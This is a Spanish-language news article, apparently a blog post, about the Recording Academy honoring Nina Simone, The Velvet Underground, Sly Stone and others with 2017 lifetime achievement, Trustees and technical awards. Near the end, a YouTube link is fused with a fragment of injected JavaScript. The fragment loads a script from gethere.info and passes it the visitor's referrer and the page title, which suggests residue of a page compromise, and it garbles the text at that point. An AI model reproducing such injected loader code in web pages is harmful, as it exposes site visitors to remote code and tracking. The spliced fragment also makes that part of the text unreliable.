Nina Simone será homenajeada por la Academia de Grabación

Además de la cantante norteamericana, The Velvet Underground y Sly Stone, también serán honrados

La cantante de jazz y soul, Nina Simone, recibirá una homenaje post mortem por la Academia de la Grabación de Estados Unidos durante la ceremonia de entrega de premios, anunció la organización a través de un comunicado donde también se revelaron las listas de los artistas a ser galardonados.

De igual forma, la academia indicó que la agrupación neoyorquina, The Velvet Underground, así como Sly Stone, líder del conjunto pionero del funk, Sly and the Family Stone, también serán honrados durante el acto.

 

En el comunicado, la Academia de la Grabación adelantó quiénes serán galardonados en 2017 con el “Lifetime Achievement Award”, un premio que reconoce la obra y carrera de aquellos artistas que hicieron contribuciones de gran importancia en el campo de la grabación de música.

Asimismo, la relación de galardonados en ese apartado incluye los nombres de la cantante de gospel Shirley Caesar, el pianista de jazz Ahmad Jamal y los músicos de country Charley Pride y Jimmie Rodgers.

En tanto, la Academia entregará el premio “Trustees Award”, por medio del cual se reconoce las aportaciones musicales más allá de las actuaciones, al productor y compositor Thom Bell, uno de los responsables del “sonido Philadelphia” en el soul, y a los empresarios Mo Ostin y Ralph Peer.

Asimismo, la Academia recordará a Alan Dower Blumlein, conocido por haber patentado el sonido estereofónico, con el “Technical Grammy Award”, un galardón dedicado a los logros técnicos en el ámbito de la producción musical.

https://www.youtube.com/watch?v=7jgHOcXTr50s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

360

Arian Esquivel, promotor y gestor creativo. Creador. ciclista y lector.

No hay comentarios

Dejar un comentario

Su correo electrónico no será revelado